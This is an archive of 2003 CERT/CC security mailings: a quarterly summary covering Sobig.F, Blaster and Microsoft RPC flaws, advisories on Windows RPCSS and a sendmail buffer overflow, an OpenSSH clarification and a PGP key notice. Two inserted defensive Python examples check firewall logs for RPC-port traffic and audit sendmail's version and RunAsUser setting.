Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.

Past CERT summaries are available from:

CERT Summaries
http://www.cert.org/summaries/
______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in June 2003 (CS-2003-02), we have seen a large volume of reports related to a mass mailing worm, referred to as W32/Sobig.F, and have issued advisories on the exploitation of vulnerabilities in Microsoft's RPC implementation. The culmination of the RPC vulnerabilities resulted in the W32/Blaster Worm, which affected many Microsoft users. We have also reported on a vulnerability in the Cisco IOS interface as well as on multiple vulnerabilities in Microsoft Windows libraries and Internet Explorer.

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC.
The information on the Current Activity page is reviewed and updated as reporting trends change.

CERT/CC Current Activity
http://www.cert.org/current/current_activity.html

1. W32/Sobig.F Worm

On August 18, the CERT/CC began receiving a large volume of reports of a mass mailing worm, referred to as W32/Sobig.F, spreading on the Internet. The W32/Sobig.F worm is an e-mail borne malicious program with a specially crafted attachment that has a .pif extension. The W32/Sobig.F worm requires a user to execute the attachment either manually or by using an e-mail client that will open the attachment automatically. The CERT/CC has released an Incident Note on the W32/Sobig.F worm.

CERT Incident Note IN-2003-03 W32/Sobig.F Worm
http://www.cert.org/incident_notes/IN-2003-03.html

2. Exploitation of Vulnerabilities in Microsoft RPC Interface

In late July, the CERT/CC began receiving reports of widespread scanning and exploitation of two recently discovered vulnerabilities in the Microsoft Remote Procedure Call (RPC) Interface. The CERT/CC released an advisory and a Vulnerability Note which described these vulnerabilities approximately two weeks prior to the reports of exploitation.

CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface
http://www.cert.org/advisories/CA-2003-19.html

CERT Advisory CA-2003-16 Buffer Overflow in Microsoft RPC
http://www.cert.org/advisories/CA-2003-16.html

Vulnerability Note VU#568148 Microsoft Windows RPC vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/568148

a. W32/Blaster Worm

Shortly after we released multiple documents describing Microsoft RPC vulnerabilities, we began receiving reports of widespread activity related to a new piece of malicious code known as W32/Blaster. The W32/Blaster worm exploits a vulnerability in the Microsoft DCOM RPC interface. On August 11, the CERT/CC released an advisory on W32/Blaster. We also released step-by-step recovery tips for W32/Blaster.
CERT Advisory CA-2003-20 W32/Blaster Worm
http://www.cert.org/advisories/CA-2003-20.html

W32/Blaster Recovery tips
http://www.cert.org/tech_tips/w32_blaster.html

b. W32/Welchia

Additionally, a worm was reported that attempted to exploit the same vulnerability as W32/Blaster. This worm, known alternately as 'W32/Welchia', 'W32/Nachi', or 'WORM_MS_BLAST.D', has been reported to kill and remove the msblast.exe artifact left behind by W32/Blaster, perform ICMP scanning to identify systems to target for exploitation, apply the patch from Microsoft (described in MS03-026), and reboot the system. The greatest impact of this worm appears to be the potential for denial-of-service conditions within an organization due to high levels of ICMP traffic.

3. Cisco IOS Interface Blocked by IPv4 Packet

On July 16, the CERT/CC reported on a vulnerability in many versions of Cisco IOS that could allow an intruder to execute a denial-of-service attack against a vulnerable device. We also released a companion Vulnerability Note on the same topic.

CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet
http://www.cert.org/advisories/CA-2003-15.html

Vulnerability Note VU#411332 Cisco IOS Interface Blocked by IPv4 Packet
http://www.kb.cert.org/vuls/id/411332

Two days later we released an advisory which provided information about the availability of a public exploit for the Cisco IOS vulnerability.

CERT Advisory CA-2003-17 Exploit available for the Cisco IOS Interface Blocked Vulnerabilities
http://www.cert.org/advisories/CA-2003-17.html

4. Vulnerabilities in Microsoft Windows Libraries and Internet Explorer

During this quarter, there were a number of vulnerabilities reported in Microsoft Windows Libraries and within Internet Explorer. Below is a summary of those vulnerabilities.

a. Buffer Overflow in Microsoft Windows HTML Conversion Library

A buffer overflow vulnerability exists in a shared HTML conversion library included in Microsoft Windows.
An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service. On July 14, the CERT/CC issued an advisory describing this vulnerability.

CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML Conversion Library
http://www.cert.org/advisories/CA-2003-14.html

Vulnerability Note VU#823260 Microsoft Windows HTML conversion library vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/823260

b. Integer Overflows in Microsoft Windows DirectX MIDI Library

A set of integer overflows exists in a DirectX library included in Microsoft Windows. An attacker could exploit these vulnerabilities to execute arbitrary code or to cause a denial of service. On July 25, the CERT/CC issued an advisory describing these vulnerabilities.

CERT Advisory CA-2003-18 Integer Overflows in Microsoft Windows DirectX MIDI Library
http://www.cert.org/advisories/CA-2003-18.html

Vulnerability Note VU#561284 Microsoft Windows DirectX MIDI library does not adequately validate Text or Copyright parameters in MIDI files
http://www.kb.cert.org/vuls/id/561284

Vulnerability Note VU#265232 Microsoft Windows DirectX MIDI library does not adequately validate MThd track values in MIDI files
http://www.kb.cert.org/vuls/id/265232

c. Multiple Vulnerabilities in Microsoft Internet Explorer

Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow a remote attacker to execute arbitrary code with the privileges of the user running Internet Explorer. On August 26, the CERT/CC issued an advisory describing these vulnerabilities.
CERT Advisory CA-2003-22 Multiple Vulnerabilities in Microsoft Internet Explorer
http://www.cert.org/advisories/CA-2003-22.html

Vulnerability Note VU#205148 Microsoft Internet Explorer does not properly evaluate Content-Type and Content-Disposition headers
http://www.kb.cert.org/vuls/id/205148

Vulnerability Note VU#865940 Microsoft Internet Explorer does not properly evaluate "application/hta" MIME type referenced by DATA attribute of OBJECT element
http://www.kb.cert.org/vuls/id/865940

Vulnerability Note VU#548964 Microsoft Windows BR549.DLL ActiveX control contains vulnerability
http://www.kb.cert.org/vuls/id/548964

Vulnerability Note VU#813208 Internet Explorer does not properly render an input type tag
http://www.kb.cert.org/vuls/id/813208

Vulnerability Note VU#334928 Microsoft Internet Explorer contains buffer overflow in Type attribute of OBJECT element on double-byte character set systems
http://www.kb.cert.org/vuls/id/334928

5. Malicious Code Propagation and Antivirus Software Updates

Recent reports to the CERT/CC have highlighted that the speed at which viruses are spreading is increasing and that users who were compromised may have been under the incorrect impression that merely having antivirus software installed was enough to protect them from all malicious code attacks. On July 14, the CERT/CC issued an Incident Note describing this trend.

CERT Incident Note IN-2003-01 Malicious Code Propagation and Antivirus Software Updates
http://www.cert.org/incident_notes/IN-2003-01.html
______________________________________________________________________

New CERT Coordination Center (CERT/CC) PGP Key

On September 5, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc

Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
______________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new and updated

* Advisories
  http://www.cert.org/advisories/
* Vulnerability Notes
  http://www.kb.cert.org/vuls
* CERT/CC Statistics
  http://www.cert.org/stats/cert_stats.html
* Congressional Testimony
  http://www.cert.org/congressional_testimony
* Incident Handling Certification
  http://www.cert.org/certification/
* Training Schedule
  http://www.cert.org/training/
______________________________________________________________________

This document is available from:
http://www.cert.org/summaries/CS-2003-03.html
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright © 2003 Carnegie Mellon University.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBP1zEHzpmH2w9K/0VAQEqXAP9FHdMZvoEMC4aLxZzP+e52RhSh6p9rzZ2
W+p3aBh6VOsf1mqpDnlJSZy2kydOLzTwklMm4ESxeSER81TfdbKUIgr7pfzNANn8
4DhrXxUZwcc1+5TWY6/LejrrCjZ2OpK9UxkjDSJKMEcrLqIhaEUL3Vr24iTvNliR
JKkslK9BDGk=
=w9dI
-----END PGP SIGNATURE-----

From - Wed Sep 10 14:34:18 2003
X-UIDL: 6286
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path:
Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165])
    by uclink-store.berkeley.edu (8.12.9/8.12.3) with ESMTP id h8ALVHlo404235;
    Wed, 10 Sep 2003 14:31:17 -0700 (PDT)
Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1])
    by uclink-s.berkeley.edu (8.12.9/8.12.9) with ESMTP id h8ALVC8D002552;
    Wed, 10 Sep 2003 14:31:12 -0700
Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169])
    by uclink-r.berkeley.edu (8.12.9/8.12.9) with ESMTP id h8ALV50u002388;
    Wed, 10 Sep 2003 14:31:06 -0700
Received: from canaveral.indigo.cert.org (localhost [127.0.0.1])
    by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h8ALSOFH017714;
    Wed, 10 Sep 2003 17:28:53 -0400
Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org
    (8.12.8/8.12.8/Submit/1.1) with SMTP id h8AKrKMW016421;
    Wed, 10 Sep 2003 16:53:20 -0400
Date: Wed, 10 Sep 2003 16:53:20 -0400
Message-Id:
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: CERT Advisory CA-2003-23 RPCSS Vulnerabilities in Microsoft Windows
Precedence: list
Status: RO
X-Status:
X-Keywords:
X-UID: 89

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2003-23 RPCSS Vulnerabilities in Microsoft Windows

Original release date: September 10, 2003
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft Windows NT Workstation 4.0
* Microsoft Windows NT Server 4.0
* Microsoft Windows NT Server 4.0, Terminal Server Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003

Overview

Microsoft has published a bulletin describing three vulnerabilities that affect numerous versions of Microsoft Windows. Two of these vulnerabilities are remotely exploitable buffer overflows that may allow an attacker to execute arbitrary code with system privileges. The third vulnerability may allow a remote attacker to cause a denial of service.

I. Description

The Microsoft RPCSS Service is responsible for managing Remote Procedure Call (RPC) messages. There are two buffer overflow vulnerabilities in the RPCSS service, which is enabled by default on many versions of Microsoft Windows. These buffer overflows occur in sections of code that handle DCOM activation messages sent to the RPCSS service. The CERT/CC is tracking these vulnerabilities as VU#483492 and VU#254236, which correspond to CVE candidates CAN-2003-0715 and CAN-2003-0528, respectively. The buffer overflows discussed in this advisory are different from those discussed in previous advisories.
Microsoft has also published information regarding a denial-of-service vulnerability in the RPCSS service. This vulnerability only affects Microsoft Windows 2000 systems. The CERT/CC is tracking this vulnerability as VU#326746, which corresponds to CVE candidate CAN-2003-0605. This vulnerability was previously discussed in CA-2003-19.

II. Impact

By exploiting either of the buffer overflow vulnerabilities, remote attackers may be able to execute arbitrary code with Local System privileges. By exploiting the denial-of-service vulnerability, remote attackers may be able to disrupt the RPCSS service. This may result in general system instability and require a reboot.

III. Solution

Apply a patch from Microsoft

Microsoft has published Microsoft Security Bulletin MS03-039 to address these vulnerabilities. For more information, please see

http://www.microsoft.com/technet/security/bulletin/MS03-039.asp

This bulletin supersedes MS03-026.

Block traffic to and from common Microsoft RPC ports

As an interim measure, users can reduce the chance of successful exploitation by blocking traffic to and from well-known Microsoft RPC ports, including

* Port 135 (tcp/udp)
* Port 137 (udp)
* Port 138 (udp)
* Port 139 (tcp)
* Port 445 (tcp/udp)
* Port 593 (tcp)

To prevent compromised hosts from contacting other vulnerable hosts, the CERT/CC recommends that system administrators filter the ports listed above for both incoming and outgoing traffic.

Disable COM Internet Services and RPC over HTTP

COM Internet Services (CIS) is an optional component that allows RPC messages to be tunneled over HTTP ports 80 and 443. As an interim measure, sites that use CIS may wish to disable it as an alternative to blocking traffic to and from ports 80 and 443.

Disable DCOM

Disable DCOM as described in MS03-039 and Microsoft Knowledge Base Article 825750.

_________________________________________________________________

This document was written by Jeffrey P. Lanza and is based upon the information in MS03-039.
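Added example (not part of the CERT advisory): a small Python script that applies the port list above to firewall log records. The log format, the internal address ranges and the sample records are constructed for the example; a site would substitute its own export format and address space. It flags each record whose destination is one of the listed port/protocol pairs, labels it inbound, outbound or internal, and reports internal hosts that contact several peers on those ports, which is the compromised-host-to-vulnerable-host traffic that the advice to filter in both directions is meant to stop.

```python
"""Flag traffic on the Microsoft RPC ports listed in CA-2003-23.

Added example; not part of the CERT advisory. It reads a constructed,
generic firewall log (one record per line) and reports which records hit
the advisory's port list, in which direction, and which internal hosts
are contacting many peers on those ports.
"""
import ipaddress
from collections import defaultdict

# Port/protocol pairs exactly as listed in the advisory's interim measure.
RPC_PORTS = {
    135: {"tcp", "udp"},
    137: {"udp"},
    138: {"udp"},
    139: {"tcp"},
    445: {"tcp", "udp"},
    593: {"tcp"},
}

# Assumed internal address space (placeholder; substitute the site's own ranges).
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Constructed sample log lines in the assumed format:
# "<timestamp> <action> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
SAMPLE_LOG = """\
2003-09-11T08:00:01 ACCEPT tcp 203.0.113.7:4123 -> 10.1.2.3:135
2003-09-11T08:00:02 ACCEPT tcp 10.1.2.3:1045 -> 10.1.2.4:135
2003-09-11T08:00:03 ACCEPT tcp 10.1.2.3:1046 -> 10.1.2.5:135
2003-09-11T08:00:04 ACCEPT tcp 10.1.2.3:1047 -> 10.1.2.6:135
2003-09-11T08:00:05 ACCEPT tcp 10.1.2.9:1050 -> 198.51.100.20:80
2003-09-11T08:00:06 ACCEPT udp 10.1.2.3:137 -> 10.1.2.255:137
2003-09-11T08:00:07 ACCEPT tcp 10.1.2.9:1051 -> 198.51.100.21:593
2003-09-11T08:00:08 ACCEPT udp 10.1.2.9:1052 -> 198.51.100.21:139
this line is not a firewall record
"""


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_rpc_port(proto, port):
    """True only for the port/protocol combinations the advisory names."""
    return proto in RPC_PORTS.get(port, set())


def direction(src_ip, dst_ip):
    src_in, dst_in = is_internal(src_ip), is_internal(dst_ip)
    if src_in and dst_in:
        return "internal"
    if src_in:
        return "outbound"
    if dst_in:
        return "inbound"
    return "external"


def parse_record(line):
    """Parse one log line; return None for lines that do not fit the format."""
    parts = line.split()
    if len(parts) != 6 or parts[4] != "->":
        return None
    ts, action, proto, src, _, dst = parts
    try:
        src_ip, src_port = src.rsplit(":", 1)
        dst_ip, dst_port = dst.rsplit(":", 1)
        ipaddress.ip_address(src_ip)
        ipaddress.ip_address(dst_ip)
        return {
            "ts": ts,
            "action": action,
            "proto": proto.lower(),
            "src_ip": src_ip,
            "src_port": int(src_port),
            "dst_ip": dst_ip,
            "dst_port": int(dst_port),
        }
    except ValueError:
        return None


def analyze(log_text):
    """Return the flagged records and, per source, the distinct peers it hit."""
    flagged = []
    peers = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or not is_rpc_port(rec["proto"], rec["dst_port"]):
            continue
        rec["direction"] = direction(rec["src_ip"], rec["dst_ip"])
        flagged.append(rec)
        peers[rec["src_ip"]].add(rec["dst_ip"])
    return flagged, peers


def spreading_hosts(peers, min_peers=3):
    """Internal sources contacting at least min_peers distinct hosts on RPC ports."""
    return sorted(src for src, dsts in peers.items()
                  if is_internal(src) and len(dsts) >= min_peers)


if __name__ == "__main__":
    flagged, peers = analyze(SAMPLE_LOG)
    for rec in flagged:
        print(f"{rec['ts']} {rec['direction']:8} {rec['proto']}/{rec['dst_port']} "
              f"{rec['src_ip']} -> {rec['dst_ip']}")
    print("possible spreading hosts:", spreading_hosts(peers))
```

The port table is keyed on protocol as well as port, so the check matches the advisory's list rather than a bare port number: UDP to port 139, for instance, is not on the list and is not flagged, while UDP to 137 is.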
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-23.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
  CERT Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2003 Carnegie Mellon University.

Revision History

Sep 10, 2003: Initial release

Date: Thu, 18 Sep 2003 10:39:13 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Subject: CERT Advisory CA-2003-25 Buffer Overflow in Sendmail

CERT Advisory CA-2003-25 Buffer Overflow in Sendmail

Original issue date: September 18, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Systems running open-source sendmail versions prior to 8.12.10, including UNIX and Linux systems
* Commercial releases of sendmail including Sendmail Switch, Sendmail Advanced Message Server (SAMS), and Sendmail for NT

Overview

A vulnerability in sendmail could allow a remote attacker to execute arbitrary code with the privileges of the sendmail daemon, typically root.

I. Description

Sendmail is a widely deployed mail transfer agent (MTA). Many UNIX and Linux systems provide a sendmail implementation that is enabled and running by default.

Sendmail contains a vulnerability in its address parsing code. An error in the prescan() function could allow an attacker to write past the end of a buffer, corrupting memory structures. Depending on platform and operating system architecture, the attacker may be able to execute arbitrary code with a specially crafted email message. This vulnerability is different from the one described in CA-2003-12.

The email attack vector is message-oriented as opposed to connection-oriented. This means that the vulnerability is triggered by the contents of a specially crafted email message rather than by lower-level network traffic. This is important because an MTA that does not contain the vulnerability may pass the malicious message along to other MTAs that may be protected at the network level. In other words, vulnerable sendmail servers on the interior of a network are still at risk, even if the site's border MTA uses software other than sendmail. Also, messages capable of exploiting this vulnerability may pass undetected through packet filters or firewalls.

Further information is available in VU#784980. Common Vulnerabilities and Exposures (CVE) refers to this issue as CAN-2003-0694.

II. Impact

Depending on platform and operating system architecture, a remote attacker could execute arbitrary code with the privileges of the sendmail daemon. Unless the RunAsUser option is set, Sendmail typically runs as root.

III. Solution

Upgrade or apply a patch

This vulnerability is resolved in Sendmail 8.12.10. Sendmail has also released a patch that can be applied to Sendmail 8.9.x through 8.12.9. Information about specific vendors is available in Appendix A and in the Systems Affected section of VU#784980.

Sendmail 8.12.10 is designed to correct malformed messages that are transferred by the server. This should help protect other vulnerable sendmail servers.

Enable the RunAsUser option

While there is no known complete workaround, consider setting the RunAsUser option to reduce the impact of this vulnerability. It is typically considered to be a good security practice to limit the privileges of applications and services whenever possible.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated, and the changes are noted in the revision history. If a vendor is not listed below, we have not received their direct statement. Further vendor information is available in the Systems Affected section of VU#784980.

Debian

The sendmail and sendmail-wide packages are vulnerable to this issue. Updated packages are being prepared and will be available soon.

F5 Networks

BIG-IP and 3-DNS products are not vulnerable.

IBM

The AIX Security Team is aware of the issues discussed in CERT Vulnerability Note VU#784980. The following APARs will be released to address this issue:

APAR number for AIX 4.3.3: IY48659 (available approx. 10/03/03)
APAR number for AIX 5.1.0: IY48658 (available approx. 10/15/03)
APAR number for AIX 5.2.0: IY48657 (available approx. 10/29/03)

An e-fix will be available shortly.
The e-fix will be available from:
ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_4_efix.tar.Z

This vendor statement will be updated when the e-fix becomes available.

Lotus

This is a sendmail-specific issue that does not affect any Lotus products.

Network Appliance

NetApp products are not vulnerable to this problem.

NetBSD

NetBSD-current has shipped with sendmail 8.12.9 since June 1, 2003. The patch was applied on September 17, 2003. In the near future we will upgrade to sendmail 8.12.10. Our official releases, such as NetBSD 1.6.1, are also affected (they ship with an older version of sendmail). They will be patched as soon as possible. We will issue a NetBSD Security Advisory on this matter.

Openwall GNU/*/Linux

Openwall GNU/*/Linux is not vulnerable. We ship Postfix, not Sendmail.

Red Hat

Red Hat Linux and Red Hat Enterprise Linux ship with a Sendmail package vulnerable to these issues. Updated Sendmail packages are available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool.

Red Hat Linux:
http://rhn.redhat.com/errata/RHSA-2003-283.html

Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2003-284.html

The Sendmail Consortium

The Sendmail Consortium recommends that sites upgrade to 8.12.10 whenever possible. Alternatively, patches are available for 8.9, 8.10, 8.11, and 8.12 on http://www.sendmail.org/.

Sendmail Inc.

All commercial releases including Sendmail Switch, Sendmail Advanced Message Server (which includes the Sendmail Switch MTA), Sendmail for NT, and Sendmail Pro are affected by this issue. Patch information is available at http://www.sendmail.com/security/.

Sun

Sun acknowledges that our recent release of sendmail 8.12.10 is affected by this issue on Solaris releases S7, S8 and S9. A Sun Alert for this issue will be issued very soon, which will then be available from:
http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/56860

There are no patches available at this time.
The Sun Alert will be updated with the patch information as it becomes available. Please refer to the Sun Alert, when available, for more information.

SuSE

SuSE products shipping sendmail are affected. Update packages that fix the vulnerability are being prepared and will be published shortly.

Appendix B. References

* CERT/CC Vulnerability Note VU#784980 -
* Michal Zalewski's post to BugTraq -
* Sendmail 8.12.10 -
* Sendmail patch for 8.12.9 -
* Sendmail 8.12.10 announcement -
* Sendmail Secure Install -

_________________________________________________________________

This vulnerability was discovered by Michal Zalewski. Thanks to Claus Assmann and Eric Allman of Sendmail for their help in preparing this document.

_________________________________________________________________

Feedback can be directed to the author, Art Manion.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-25.html
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2003 Carnegie Mellon University.

Revision History

September 18, 2003: Initial release

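Added example for the Solution section of CA-2003-25 above (not the advisory's or Sendmail's own code): a Python check for its two action items, run offline against constructed inputs. It parses a version string in the form printed by sendmail's -d0.1 debug flag ("Version 8.12.9"), compares it with the fixed release 8.12.10, and looks for the RunAsUser option (the "O RunAsUser=" line that sendmail.cf gets from the m4 macro confRUN_AS_USER) in a sendmail.cf fragment. The sample output and configuration lines are constructed, and the user name smmsp is a placeholder. A version check alone cannot tell a vendor-patched 8.9.x-8.12.9 build (the advisory says such patches exist) from an unpatched one, so a version hit means "verify the patch level", not "confirmed vulnerable".

```python
"""Check a sendmail host against the two action items in CA-2003-25.

Added example; not the advisory's or Sendmail's own code. It decides
(1) whether a reported sendmail version predates the fixed release,
8.12.10, and (2) whether sendmail.cf sets the RunAsUser option the
advisory recommends. All inputs below are constructed samples.
"""
import re

FIXED_VERSION = (8, 12, 10)  # first open-source release with the fix

# Constructed sample in the form of the first line printed by
# `sendmail -d0.1 -bv root` (an assumption about the output format).
SAMPLE_VERSION_OUTPUT = "Version 8.12.9\n Compiled with: DNSMAP LOG MATCHGECOS\n"

# Constructed sendmail.cf fragments. The RunAsUser option line is what
# the m4 macro confRUN_AS_USER generates; "smmsp" is a placeholder user.
CF_NO_RUNASUSER = """\
V10/Berkeley
O LogLevel=9
O QueueDirectory=/var/spool/mqueue
"""
CF_WITH_RUNASUSER = CF_NO_RUNASUSER + "O RunAsUser=smmsp\n"

VERSION_RE = re.compile(r"\bVersion\s+(\d+)\.(\d+)\.(\d+)")
RUNASUSER_RE = re.compile(r"^O\s*RunAsUser\s*=\s*([^\s:]+)", re.MULTILINE)


def parse_version(output):
    """Return (major, minor, patch) from version output, or None."""
    m = VERSION_RE.search(output)
    return tuple(int(x) for x in m.groups()) if m else None


def version_is_vulnerable(version):
    """True for open-source sendmail prior to 8.12.10, as listed in the
    advisory. A vendor-patched 8.9.x-8.12.9 build cannot be told apart
    by version alone, so treat a hit as "verify the patch level"."""
    return version < FIXED_VERSION


def run_as_user(cf_text):
    """User named by the RunAsUser option, or None if the option is absent.
    RunAsUser may be written user:group; only the user part is returned."""
    m = RUNASUSER_RE.search(cf_text)
    return m.group(1) if m else None


def audit(version_output, cf_text):
    """List of findings; an empty list means both action items are met."""
    findings = []
    version = parse_version(version_output)
    if version is None:
        findings.append("could not determine the sendmail version")
    elif version_is_vulnerable(version):
        findings.append(
            "sendmail %d.%d.%d predates 8.12.10: upgrade or apply the vendor patch"
            % version)
    user = run_as_user(cf_text)
    if user is None or user == "root":
        findings.append(
            "RunAsUser is not set (daemon runs as root): set it to a "
            "dedicated unprivileged user to limit the impact")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_VERSION_OUTPUT, CF_NO_RUNASUSER):
        print("FINDING:", finding)
```

Because the advisory stresses that the attack is message-oriented, the same check belongs on every interior sendmail host, not only on the border MTA; running it fleet-wide is the point, since a non-sendmail border MTA relays the message unchanged.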
Date: Mon, 29 Sep 2003 18:26:12 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Subject: CERT Advisory Notice: Clarifications regarding recent vulnerabilities in OpenSSH

CERT Advisory Notice: Clarifications regarding recent vulnerabilities in OpenSSH

The CERT/CC has received queries regarding several recent OpenSSH vulnerabilities. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities.

There have been several recent vulnerabilities affecting OpenSSH. They are

VU#333628 - OpenSSH contains buffer management errors
http://www.kb.cert.org/vuls/id/333628

This issue addresses two releases of OpenSSH to resolve multiple issues in the buffer management code. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. Note that there are other additional flaws in the buffer management code, as reported by Openwall GNU/*/Linux in http://www.kb.cert.org/vuls/id/JARL-5RFQQZ. These four additional flaws are believed to be relatively minor, and fixes for them are scheduled to be included in the next version of OpenSSH.

VU#602204 - OpenSSH PAM challenge authentication failure
http://www.kb.cert.org/vuls/id/602204

Under non-standard configurations, portable versions of OpenSSH 3.7p1 and 3.7.1p1 are vulnerable to a remotely exploitable vulnerability.
Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access.

VU#209807 - Portable OpenSSH server PAM conversion stack corruption
http://www.kb.cert.org/vuls/id/209807

There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack. The complete impact of this vulnerability is unclear, but may lead to privilege escalation, or a denial of service.

Please check the vulnerability notes for resolutions and additional details.

Thank you.
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2003 Carnegie Mellon University.

Date: Wed, 15 Oct 2003 14:52:43 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Subject: New CERT Coordination Center (CERT/CC) PGP Key

New CERT Coordination Center (CERT/CC) PGP Key

The CERT/CC has generated a new PGP key. We use this key to sign all outgoing email, including documents sent to this list. Effective immediately, this new key is available and will be valid until Monday, November 1, 2004.

To obtain further information or to download the new CERT/CC public PGP key, please visit or

A copy of the new key has also been included at the bottom of this message and sent to public PGP key servers.

The passphrase used to protect the previous CERT/CC PGP key was accidentally exposed to a small number of non-CERT/CC personnel with whom we have a close working relationship. We have no reason to believe the encrypted form of the private key was exposed in any way, but in accordance with good key management practices, we have generated a revocation certificate for the previous PGP key. The revocation certificate for PGP key id 0x3D2BFD15 has also been included below and sent to the public PGP key servers.

If you have any questions or comments regarding this information, please contact our hotline at +1 412-268-7090 or email us at cert@cert.org.

______________________________________________________________________

This document is available from: or
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2003 Carnegie Mellon University.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQCNAz9ODi8BrwEEAK7Aozq131hsRQJ1HUmGIhOMnAdJtnVb7o5zrtv25ZJ3O0iD
kaSuqx9JSTJXVkuJoNZF4nVbmfk1gw0GBD2yBPYbVAQKlOq0W/zEEXa6R/cGTgWK
MBrOz0bnXC3Ed1/aMR/Rg/0n/H8DVrhe0ybw6vssQgcXBM+kJDpmH2w9K/0VAAUR
